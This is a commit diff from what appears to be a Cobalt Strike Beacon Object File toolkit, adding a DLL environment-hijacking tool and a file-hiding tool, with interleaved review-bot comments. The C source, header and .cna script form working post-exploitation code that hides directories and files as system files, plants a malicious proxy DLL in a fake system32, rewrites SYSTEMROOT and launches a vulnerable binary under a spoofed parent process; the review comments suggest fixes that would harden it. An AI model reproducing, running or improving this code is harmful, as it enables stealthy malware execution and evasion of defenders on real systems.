unknown 2 anni fa
parent
commit
bf580750a5

BIN
KIT/BlindEventlog/blindeventlog.o


+ 22 - 0
KIT/DllEnvHijacking/README.md

@@ -0,0 +1,22 @@
+# DllEnvHijacking
+This tool will: setup a hidden file structure, move an already on disk present malicious proxy DLL to the new system32 folder, hide the proxy DLL, modify the SYSTEMROOT environment variable, run the vulnerable binary as a spoofed process to execute the malicious DLL, and reset the original SYSTEMROOT environment variable so the beacon keeps working as intended. 
+
+>Make sure that before you run this tool, the uploaded you malicious proxy DLL to an accessible folder on disk. 
+
+More information about the DLL Environment Hijacking attack can be found [here](https://www.wietzebeukema.nl/blog/save-the-environment-variables). 
+
+## Options
+* `<new sysroot dir>:` the new directory name as a path that will be used as the new SYSTEMROOT variable like `C:\Data\` (make sure the directory path ends with `\`)
+* `<malicious DLL name>`: the name of the malicious DLL that will be loaded by the vulnerable binary (e.g. mswsock.dll).
+* `<path to mal. DLL folder>`: the path on the target system to the folder were the malicious DLL is stored (don't add the DLL name and end the path with a `\`)
+* `<name of vulnerable binary>`: the name of the vulnerable binary that will be executed and loads the malicious DLL (e.g. hostname.exe).
+* `<pid parent proc>`: the process ID of the parent process under which the vulnerable binary will run as a child.
+
+## Usage
+* `dllenvhijacking <new sysroot dir> <malicious DLL name> <path to mal. DLL folder> <name of vulnerable binary> <pid parent proc>`
+
+## Compile
+- 1\. Make sure Visual Studio is installed and supports C/C++.
+- 2\. Open the `x64 Native Tools Command Prompt for VS <2019/2022>` terminal.
+- 3\. Run the `bofcompile.bat` script to compile the object file. 
+- 4\. In Cobalt strike, use the script manager to load the .cna script to import the tool. 

+ 69 - 0
KIT/DllEnvHijacking/beacon.h

@@ -0,0 +1,69 @@
+/*
+ * Beacon Object Files (BOF)
+ * -------------------------
+ * A Beacon Object File is a light-weight post exploitation tool that runs
+ * with Beacon's inline-execute command.
+ *
+ * Additional BOF resources are available here:
+ *   - https://github.com/Cobalt-Strike/bof_template
+ *
+ * Cobalt Strike 4.x
+ * ChangeLog:
+ *    1/25/2022: updated for 4.5
+ */
+
+/* data API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} datap;
+
+DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
+DECLSPEC_IMPORT char *  BeaconDataPtr(datap * parser, int size);
+DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
+DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
+DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
+DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);
+
+/* format API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} formatp;
+
+DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
+DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
+DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
+DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
+DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);
+
+/* Output Functions */
+#define CALLBACK_OUTPUT      0x0
+#define CALLBACK_OUTPUT_OEM  0x1e
+#define CALLBACK_OUTPUT_UTF8 0x20
+#define CALLBACK_ERROR       0x0d
+
+DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);
+DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);
+
+
+/* Token Functions */
+DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
+DECLSPEC_IMPORT void   BeaconRevertToken();
+DECLSPEC_IMPORT BOOL   BeaconIsAdmin();
+
+/* Spawn+Inject Functions */
+DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
+DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT BOOL   BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo);
+DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
+
+/* Utility Functions */
+DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);

+ 6 - 0
KIT/DllEnvHijacking/bofcompile.bat

@@ -0,0 +1,6 @@
+@ECHO OFF
+
+cl.exe /nologo /c /Od /MT /W0 /GS- /Tc dllenvhijacking.c
+move /y dllenvhijacking.obj dllenvhijacking.o
+dumpbin /disasm dllenvhijacking.o > dllenvhijacking.disasm
+
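Review bot: `/W0` on the `cl.exe` line silences every compiler diagnostic, which is what lets the pointer/int mismatch in dllenvhijacking.c (`int *pid` assigned from `BeaconDataInt` and then passed to `RunProc`'s `int pid`) compile without a complaint; build with `/W3` and suppress only the specific warnings that the `LIB$Func` import declarations trigger. KIT/HideFile/bofcompile.bat uses the same flags. The `dumpbin /disasm` line writes `dllenvhijacking.disasm` but nothing on the page consumes it, so it is presumably a manual inspection aid; a `REM` line saying so would make the script self-explanatory.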

+ 200 - 0
KIT/DllEnvHijacking/dllenvhijacking.c

@@ -0,0 +1,200 @@
+#include <windows.h>
+#include <stdio.h>
+#include "dllenvhijacking.h"
+#include "beacon.h"
+
+
+
+BOOL CreateHiddenDir(WCHAR *directory) {
+	DWORD attrib;
+	
+	if(KERNEL32$CreateDirectoryW(directory, NULL) == 0) {
+		if(KERNEL32$GetLastError() == 183) BeaconPrintf(CALLBACK_ERROR, "Failed to create directory: ERROR_ALREADY_EXISTS\n");
+		if(KERNEL32$GetLastError() == 3) BeaconPrintf(CALLBACK_ERROR, "Failed to create directory: ERROR_PATH_NOT_FOUND\n");
+		return FALSE;
+	}
+		
+	attrib = KERNEL32$GetFileAttributesW(directory);
+	if(attrib == INVALID_FILE_ATTRIBUTES) {
+		BeaconPrintf(CALLBACK_ERROR, "Failed to retrieve file attribute information from directory with error code: %ld\n", KERNEL32$GetLastError());
+		return FALSE;
+	}
+	attrib |= FILE_ATTRIBUTE_HIDDEN;
+	attrib |= FILE_ATTRIBUTE_SYSTEM;
+
+	if(KERNEL32$SetFileAttributesW(directory, attrib) == 0) {
+		BeaconPrintf(CALLBACK_ERROR, "Failed to set new attribute information on the directory with error code: %ld\n", KERNEL32$GetLastError());
+		return FALSE;
+	}
+	return TRUE;
+}
+
+
+BOOL CreateHiddenFile(WCHAR *file) {
+	HANDLE hFile;
+	FILE_BASIC_INFORMATION fileInfo;
+	IO_STATUS_BLOCK ioStatusBlock;
+	
+
+	NtQueryInformationFile_t pNtQueryInformationFile = (NtQueryInformationFile_t)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryInformationFile");
+	if(pNtQueryInformationFile == NULL) return 0;
+
+    NtSetInformationFile_t pNtSetInformationFile = (NtSetInformationFile_t)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtSetInformationFile");
+	if(pNtSetInformationFile == NULL) return 0;
+
+
+	hFile = KERNEL32$CreateFileW(file, GENERIC_READ | GENERIC_WRITE | FILE_WRITE_ATTRIBUTES, 0, NULL, OPEN_EXISTING, 0, NULL);
+	if (hFile == INVALID_HANDLE_VALUE) {
+		BeaconPrintf(CALLBACK_ERROR, "Could not open file with error code: %ld\n", KERNEL32$GetLastError());
+		return FALSE;
+	}
+
+	if (pNtQueryInformationFile(hFile, &ioStatusBlock, &fileInfo, sizeof(FILE_BASIC_INFORMATION), FileBasicInformation) < 0) {
+		BeaconPrintf(CALLBACK_ERROR, "Failed to get file attribute information with error code: %ld\n", KERNEL32$GetLastError());
+		KERNEL32$CloseHandle(hFile);
+		return FALSE;
+	}
+	
+	fileInfo.FileAttributes |= FILE_ATTRIBUTE_HIDDEN;
+	fileInfo.FileAttributes |= FILE_ATTRIBUTE_SYSTEM;
+	
+
+	if (pNtSetInformationFile(hFile, &ioStatusBlock, &fileInfo, sizeof(FILE_BASIC_INFORMATION), FileBasicInformation) < 0) {
+		BeaconPrintf(CALLBACK_ERROR, "Failed to set new attribute information on the file with error code: %ld\n", KERNEL32$GetLastError());
+		KERNEL32$CloseHandle(hFile);
+		return FALSE;
+	}
+
+	KERNEL32$CloseHandle(hFile);
+	return TRUE;
+}
+
+
+BOOL MoveDLL(WCHAR *dllSrcPath, WCHAR *dllDstPath) {
+	if (KERNEL32$MoveFileW(dllSrcPath, dllDstPath) == 0) {
+		BeaconPrintf(CALLBACK_ERROR, "Failed to move %ls with error code: %ld\n", dllSrcPath, KERNEL32$GetLastError());
+		return FALSE; 
+	}
+
+	return TRUE;
+}
+
+
+BOOL RunProc(WCHAR *sysrootPath, char *targetProcPath, int pid) {
+	STARTUPINFOEX info = { sizeof(info) };
+    PROCESS_INFORMATION processInfo;
+	SIZE_T cbAttributeListSize = 0;
+	PPROC_THREAD_ATTRIBUTE_LIST pAttributeList = NULL;
+	HANDLE hParentProcess = NULL;
+	BOOL setEnvSuccess = TRUE;
+	
+	//set env variable to new systemroot
+	if (KERNEL32$SetEnvironmentVariableW(L"SYSTEMROOT", sysrootPath) == 0) {
+		BeaconPrintf(CALLBACK_ERROR, "Failed to set the new environment variable!\n");
+		return FALSE; 
+	}
+	
+	// create fresh attributelist
+	KERNEL32$InitializeProcThreadAttributeList(NULL, 1, 0, &cbAttributeListSize); 
+	pAttributeList = (PPROC_THREAD_ATTRIBUTE_LIST) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), 0, cbAttributeListSize);
+	KERNEL32$InitializeProcThreadAttributeList(pAttributeList, 1, 0, &cbAttributeListSize);
+
+	// copy and spoof parent process ID
+	hParentProcess = KERNEL32$OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
+	KERNEL32$UpdateProcThreadAttribute(pAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hParentProcess, sizeof(HANDLE), NULL, NULL);
+	info.lpAttributeList = pAttributeList;
+	
+	// start new process under spoofed process in suspended state
+	if (KERNEL32$CreateProcessA(NULL, targetProcPath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &info.StartupInfo, &processInfo) == 0) {
+		setEnvSuccess = FALSE;
+	}
+	
+	//reset environment variable for beacon
+	if (KERNEL32$SetEnvironmentVariableW(L"SYSTEMROOT", L"C:\\Windows\\") == 0) {
+		BeaconPrintf(CALLBACK_ERROR, "Failed to reset the old environment variable!\n");
+	}
+
+	//clean up
+	KERNEL32$DeleteProcThreadAttributeList(pAttributeList);
+	KERNEL32$CloseHandle(hParentProcess);
+	KERNEL32$CloseHandle(processInfo.hProcess);
+	KERNEL32$CloseHandle(processInfo.hThread);
+
+	return setEnvSuccess;
+}
+
+
+int go(char *args, int len) {
+	WCHAR wsys32[] = L"system32\\";
+	char sys32[] = "C:\\windows\\system32\\";
+	WCHAR newSys32Path[100]; 
+	WCHAR dllDstPath[100]; 
+	WCHAR dllSrcPath[100]; 
+	char targetProcPath[100];
+	WCHAR *sysrootPath; //L"C:\\Data\\";
+	WCHAR *proxyDll; //L"mswsock.dll"
+	WCHAR *inputDllSrcPath; //L"C:\\Users\\Public\\Documents\\"
+	char *targetProc; //"hostname.exe"
+	int *pid; //5456
+	BOOL res = FALSE;
+	datap parser;
+	
+	BeaconDataParse(&parser, args, len);
+	sysrootPath = BeaconDataExtract(&parser, NULL);
+	proxyDll = BeaconDataExtract(&parser, NULL);
+	inputDllSrcPath = BeaconDataExtract(&parser, NULL);
+	targetProc = BeaconDataExtract(&parser, NULL);
+	pid = BeaconDataInt(&parser);
+	
+
+	res = CreateHiddenDir(sysrootPath);
+	if (!res) return 0;
+	else {
+		res = FALSE;
+	}
+
+	MSVCRT$wcscpy(newSys32Path, sysrootPath);
+	MSVCRT$wcscat(newSys32Path, wsys32);
+	res = CreateHiddenDir(newSys32Path);
+	if (!res) return 0;
+	else {
+		BeaconPrintf(CALLBACK_OUTPUT, "[+] Created new directory structure %ls as systemfile + hidden\n", newSys32Path);
+		res = FALSE;
+	}
+	
+	MSVCRT$wcscpy(dllDstPath, newSys32Path);
+	MSVCRT$wcscat(dllDstPath, proxyDll);
+	MSVCRT$wcscpy(dllSrcPath, inputDllSrcPath);
+	MSVCRT$wcscat(dllSrcPath, proxyDll);
+	res = MoveDLL(dllSrcPath, dllDstPath);
+	if (!res) return 0;
+	else {
+		res = FALSE;
+	}
+	
+	res = CreateHiddenFile(dllDstPath);
+	if (!res) return 0;
+	else {
+		BeaconPrintf(CALLBACK_OUTPUT, "[+] Moved DLL to location %ls and made it a systemfile + hidden\n", dllDstPath);
+		res = FALSE;
+	}
+	
+	MSVCRT$strcpy(targetProcPath, sys32);
+	MSVCRT$strcat(targetProcPath, targetProc);
+	res = RunProc(sysrootPath, targetProcPath, pid);
+	if (!res) BeaconPrintf(CALLBACK_ERROR, "Failed to start process %s as a spoofed child from PID: %d\n", targetProcPath, pid);
+	else {
+		BeaconPrintf(CALLBACK_OUTPUT, "[+] Modified SYSTEMROOT environment variable to %ls and executed the DLL as a spoofed process of PID: %d\n",sysrootPath, pid);
+	}
+	
+	return 0;
+}
+
+
+
+
+
+
+
+
+
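Review bot: In `go`, `pid` is declared `int *pid` but receives the `int` returned by `BeaconDataInt`, is passed to `RunProc(..., int pid)` and printed with `%d`; it should be `int pid;` — this only compiles because the build uses `/W0`. The four 100-element buffers (`newSys32Path`, `dllDstPath`, `dllSrcPath`, `targetProcPath`) are filled by unchecked `wcscpy`/`wcscat`/`strcpy`/`strcat` of operator-supplied strings, so an over-long path overwrites the stack of the host process; compare the combined lengths against the buffer size (the header already declares `MSVCRT$wcslen`) and fail with a `CALLBACK_ERROR` before copying. In `CreateHiddenFile` the two `GetProcAddress` failure paths `return 0` with no message, unlike every other error path in the file; `return FALSE` preceded by a `BeaconPrintf(CALLBACK_ERROR, ...)` in the surrounding style would be consistent (the same function is duplicated verbatim in KIT/HideFile/hidefile.c). Also in `RunProc`, the buffer from `KERNEL32$HeapAlloc` is never released — `DeleteProcThreadAttributeList` does not free the memory — so a matching `HeapFree` is needed after it, which would also require a declaration in dllenvhijacking.h.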

+ 35 - 0
KIT/DllEnvHijacking/dllenvhijacking.cna

@@ -0,0 +1,35 @@
+# author REDMED-X
+
+beacon_command_register(
+	"dllenvhijacking", "BOF implementation of DLL environment hijacking.\n",
+	"INFO:\nThis tool will setup a hidden file structure, move an already on disk present malicious proxy DLL to the new system32 folder, hide the proxy DLL, modify the SYSTEMROOT environment variable, run the vulnerable binary as a spoofed process to execute the malicious DLL, and reset the original SYSTEMROOT environment variable so the beacon keeps working as intended.\n\nOPTIONS:\n[<new sysroot dir>]: the new directory name as a path that will be used as the new SYSTEMROOT variable like C:\\Data\\ (make sure the directory path ends with \\).\n[<malicious DLL name>]: the name of the malicious DLL that will be loaded by the vulnerable binary (e.g. mswsock.dll).\n[<path to mal. DLL folder>]: the path on the target system to the folder were the malicious DLL is stored (don't add the DLL name and end the path with a \\).\n[<name of vulnerable binary>]: the name of the vulnerable binary that will be executed and loads the malicious DLL (e.g. hostname.exe).\n[<pid parent proc>]: the process ID of the parent process under which the vulnerable binary will run as a child.\n\n" .
+	"USAGE:\ndllenvhijacking <new sysroot dir> <malicious DLL name> <path to mal. DLL folder> <name of vulnerable binary> <pid parent proc>\n\n");
+
+
+alias dllenvhijacking {
+    $bid = $1;
+    $sysroot = $2;
+	$proxydll = $3;
+	$pathtodll = $4;
+	$vulnbinary = $5;
+	$pid = $6;
+
+	if ($sysroot eq "" || $proxydll eq "" || $pathtodll eq "" || $vulnbinary eq "" || $pid eq "") {
+		berror($bid, "Please make sure that all the arguments are filled in and correct!\n");
+		return;
+	}
+	
+    # Read in the right BOF file
+    $handle = openf(script_resource("dllenvhijacking.o"));
+    $data   = readb($handle, -1);
+    closef($handle);
+
+	# Pack our arguments
+    $arg_data  = bof_pack($bid, "ZZZzi", $sysroot, $proxydll, $pathtodll, $vulnbinary, $pid);
+	
+
+	blog($bid, "Tasked execute DLL Environment hijacking..");
+    beacon_inline_execute($bid, $data, "go", $arg_data);
+}
+
+
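Review bot: `alias dllenvhijacking` mixes four-space indentation (`$bid`, `$sysroot`, the `openf`/`readb`/`closef` lines, `$arg_data`, `beacon_inline_execute`) with tab indentation on the remaining lines; pick one so the block reads consistently (KIT/HideFile/hidefile.cna has the same mix). `$pid` is only checked for being empty before it is packed with the `i` format and consumed as an integer on the C side, so a non-numeric value would presumably be packed as 0; adding `|| !-isnumber $pid` to the existing guard would catch a typo before the BOF is tasked.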

+ 150 - 0
KIT/DllEnvHijacking/dllenvhijacking.h

@@ -0,0 +1,150 @@
+#include <windows.h>
+
+typedef struct _FILE_BASIC_INFORMATION {
+	LARGE_INTEGER CreationTime;				// absolute system, number of 100-nanosecond intervals 
+	LARGE_INTEGER LastAccessTime;			// since the start of the year 1601 in the Gregorian calendar.
+	LARGE_INTEGER LastWriteTime;
+	LARGE_INTEGER ChangeTime;
+	ULONG FileAttributes;					// metadata about the file, ex.: archive, compressed, directory, hidden, etc.
+} FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION;
+
+
+typedef enum _FILE_INFORMATION_CLASS {
+    FileDirectoryInformation                         = 1,
+    FileFullDirectoryInformation,                   // 2
+    FileBothDirectoryInformation,                   // 3
+    FileBasicInformation,                           // 4
+    FileStandardInformation,                        // 5
+    FileInternalInformation,                        // 6
+    FileEaInformation,                              // 7
+    FileAccessInformation,                          // 8
+    FileNameInformation,                            // 9
+    FileRenameInformation,                          // 10
+    FileLinkInformation,                            // 11
+    FileNamesInformation,                           // 12
+    FileDispositionInformation,                     // 13
+    FilePositionInformation,                        // 14
+    FileFullEaInformation,                          // 15
+    FileModeInformation,                            // 16
+    FileAlignmentInformation,                       // 17
+    FileAllInformation,                             // 18
+    FileAllocationInformation,                      // 19
+    FileEndOfFileInformation,                       // 20
+    FileAlternateNameInformation,                   // 21
+    FileStreamInformation,                          // 22
+    FilePipeInformation,                            // 23
+    FilePipeLocalInformation,                       // 24
+    FilePipeRemoteInformation,                      // 25
+    FileMailslotQueryInformation,                   // 26
+    FileMailslotSetInformation,                     // 27
+    FileCompressionInformation,                     // 28
+    FileObjectIdInformation,                        // 29
+    FileCompletionInformation,                      // 30
+    FileMoveClusterInformation,                     // 31
+    FileQuotaInformation,                           // 32
+    FileReparsePointInformation,                    // 33
+    FileNetworkOpenInformation,                     // 34
+    FileAttributeTagInformation,                    // 35
+    FileTrackingInformation,                        // 36
+    FileIdBothDirectoryInformation,                 // 37
+    FileIdFullDirectoryInformation,                 // 38
+    FileValidDataLengthInformation,                 // 39
+    FileShortNameInformation,                       // 40
+    FileIoCompletionNotificationInformation,        // 41
+    FileIoStatusBlockRangeInformation,              // 42
+    FileIoPriorityHintInformation,                  // 43
+    FileSfioReserveInformation,                     // 44
+    FileSfioVolumeInformation,                      // 45
+    FileHardLinkInformation,                        // 46
+    FileProcessIdsUsingFileInformation,             // 47
+    FileNormalizedNameInformation,                  // 48
+    FileNetworkPhysicalNameInformation,             // 49
+    FileIdGlobalTxDirectoryInformation,             // 50
+    FileIsRemoteDeviceInformation,                  // 51
+    FileUnusedInformation,                          // 52
+    FileNumaNodeInformation,                        // 53
+    FileStandardLinkInformation,                    // 54
+    FileRemoteProtocolInformation,                  // 55
+    FileRenameInformationBypassAccessCheck,         // 56
+    FileLinkInformationBypassAccessCheck,           // 57
+    FileVolumeNameInformation,                      // 58
+    FileIdInformation,                              // 59
+    FileIdExtdDirectoryInformation,                 // 60
+    FileReplaceCompletionInformation,               // 61
+    FileHardLinkFullIdInformation,                  // 62
+    FileIdExtdBothDirectoryInformation,             // 63
+    FileDispositionInformationEx,                   // 64
+    FileRenameInformationEx,                        // 65
+    FileRenameInformationExBypassAccessCheck,       // 66
+    FileDesiredStorageClassInformation,             // 67
+    FileStatInformation,                            // 68
+    FileMemoryPartitionInformation,                 // 69
+    FileStatLxInformation,                          // 70
+    FileCaseSensitiveInformation,                   // 71
+    FileLinkInformationEx,                          // 72
+    FileLinkInformationExBypassAccessCheck,         // 73
+    FileStorageReserveIdInformation,                // 74
+    FileCaseSensitiveInformationForceAccessCheck,   // 75
+    FileKnownFolderInformation,   					// 76
+    FileMaximumInformation
+} FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS;
+
+
+typedef struct _IO_STATUS_BLOCK {
+  union {
+    NTSTATUS Status;
+    PVOID    Pointer;
+  };
+  ULONG_PTR Information;
+} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
+
+
+typedef NTSTATUS (NTAPI *NtQueryInformationFile_t)(
+  HANDLE                 FileHandle,
+  PIO_STATUS_BLOCK       IoStatusBlock,
+  PVOID                  FileInformation,
+  ULONG                  Length,
+  FILE_INFORMATION_CLASS FileInformationClass
+);
+
+
+typedef NTSTATUS (NTAPI *NtSetInformationFile_t)(
+  HANDLE                 FileHandle,
+  PIO_STATUS_BLOCK       IoStatusBlock,
+  PVOID                  FileInformation,
+  ULONG                  Length,
+  FILE_INFORMATION_CLASS FileInformationClass
+);
+
+//CreateHiddenDir
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$CreateDirectoryW(LPCWSTR lpPathName, LPSECURITY_ATTRIBUTES lpSecurityAttributes);
+DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetFileAttributesW(LPCWSTR lpFileName);
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$SetFileAttributesW(LPCWSTR lpFileName, DWORD dwFileAttributes);
+DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetLastError(void);
+WINBASEAPI int __cdecl MSVCRT$printf(const char * _Format,...); 
+WINBASEAPI int __cdecl MSVCRT$getchar(void); 
+
+//CreateHiddenFile
+DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateFileW(LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$CloseHandle (HANDLE hObject);
+
+//MoveDLL
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$MoveFileW(LPCWSTR lpExistingFileName, LPCWSTR lpNewFileName);
+
+//RunProc
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$SetEnvironmentVariableW(LPCWSTR lpName, LPCWSTR lpValue);
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$CreateProcessA(LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$InitializeProcThreadAttributeList(LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList, DWORD dwAttributeCount, DWORD dwFlags, PSIZE_T lpSize);
+DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
+DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetProcessHeap();
+DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$OpenProcess(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$UpdateProcThreadAttribute(LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList, DWORD dwFlags, DWORD_PTR Attribute, PVOID lpValue, SIZE_T cbSize, PVOID lpPreviousValue, PSIZE_T lpReturnSize);
+DECLSPEC_IMPORT void WINAPI KERNEL32$DeleteProcThreadAttributeList(LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList);
+
+//main
+WINBASEAPI wchar_t * __cdecl MSVCRT$wcscpy(wchar_t *destination, const wchar_t *source);
+WINBASEAPI wchar_t * __cdecl MSVCRT$wcscat(wchar_t *destination, const wchar_t *source);
+WINBASEAPI char * __cdecl MSVCRT$strcpy(char *destination, const char *source);
+WINBASEAPI char * __cdecl MSVCRT$strcat(char *destination, const char *source);
+WINBASEAPI size_t __cdecl MSVCRT$wcslen(const wchar_t *string);
+
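Review bot: The header has no include guard (`#pragma once` or an `#ifndef` pair), and the `//CreateHiddenDir` group declares `MSVCRT$printf` and `MSVCRT$getchar`, which dllenvhijacking.c never calls; `MSVCRT$wcslen` under `//main` is likewise unused. dllenvhijacking.c calls `GetProcAddress` and `GetModuleHandle` without the `KERNEL32$` prefix used for every other import, and this header declares neither; it is not clear from the page how the BOF loader resolves those two unprefixed symbols, so either add `KERNEL32$` declarations matching the rest of the file or a comment in this section explaining why they are left unprefixed.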

BIN
KIT/DllEnvHijacking/dllenvhijacking.o


BIN
KIT/FindDotnet/finddotnet.o


BIN
KIT/FindHandle/findhandle.o


BIN
KIT/FindLib/findlib.o


BIN
KIT/FindRWX/findrwx.o


BIN
KIT/FindSysmon/findsysmon.o


+ 16 - 0
KIT/HideFile/README.md

@@ -0,0 +1,16 @@
+# HideFile
+Hide a directory or file from plain sight by modifying the attributes and set them to systemfile + hidden.
+
+## Options
+* `dir`: set this option if you want to modify the attributes of a directory.
+* `file`: set this option if you want to modify the attributes of a file.
+* `<path to dir/file>`: path to the directory or file that you want to hide.
+
+## Usage
+* `hidefile <dir | file> <path to dir/file>`
+
+## Compile
+- 1\. Make sure Visual Studio is installed and supports C/C++.
+- 2\. Open the `x64 Native Tools Command Prompt for VS <2019/2022>` terminal.
+- 3\. Run the `bofcompile.bat` script to compile the object file. 
+- 4\. In Cobalt strike, use the script manager to load the .cna script to import the tool. 

+ 69 - 0
KIT/HideFile/beacon.h

@@ -0,0 +1,69 @@
+/*
+ * Beacon Object Files (BOF)
+ * -------------------------
+ * A Beacon Object File is a light-weight post exploitation tool that runs
+ * with Beacon's inline-execute command.
+ *
+ * Additional BOF resources are available here:
+ *   - https://github.com/Cobalt-Strike/bof_template
+ *
+ * Cobalt Strike 4.x
+ * ChangeLog:
+ *    1/25/2022: updated for 4.5
+ */
+
+/* data API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} datap;
+
+DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
+DECLSPEC_IMPORT char *  BeaconDataPtr(datap * parser, int size);
+DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
+DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
+DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
+DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);
+
+/* format API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} formatp;
+
+DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
+DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
+DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
+DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
+DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);
+
+/* Output Functions */
+#define CALLBACK_OUTPUT      0x0
+#define CALLBACK_OUTPUT_OEM  0x1e
+#define CALLBACK_OUTPUT_UTF8 0x20
+#define CALLBACK_ERROR       0x0d
+
+DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);
+DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);
+
+
+/* Token Functions */
+DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
+DECLSPEC_IMPORT void   BeaconRevertToken();
+DECLSPEC_IMPORT BOOL   BeaconIsAdmin();
+
+/* Spawn+Inject Functions */
+DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
+DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT BOOL   BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo);
+DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
+
+/* Utility Functions */
+DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);

+ 6 - 0
KIT/HideFile/bofcompile.bat

@@ -0,0 +1,6 @@
+@ECHO OFF
+
+cl.exe /nologo /c /Od /MT /W0 /GS- /Tc hidefile.c
+move /y hidefile.obj hidefile.o
+dumpbin /disasm hidefile.o > hidefile.disasm
+

+ 86 - 0
KIT/HideFile/hidefile.c

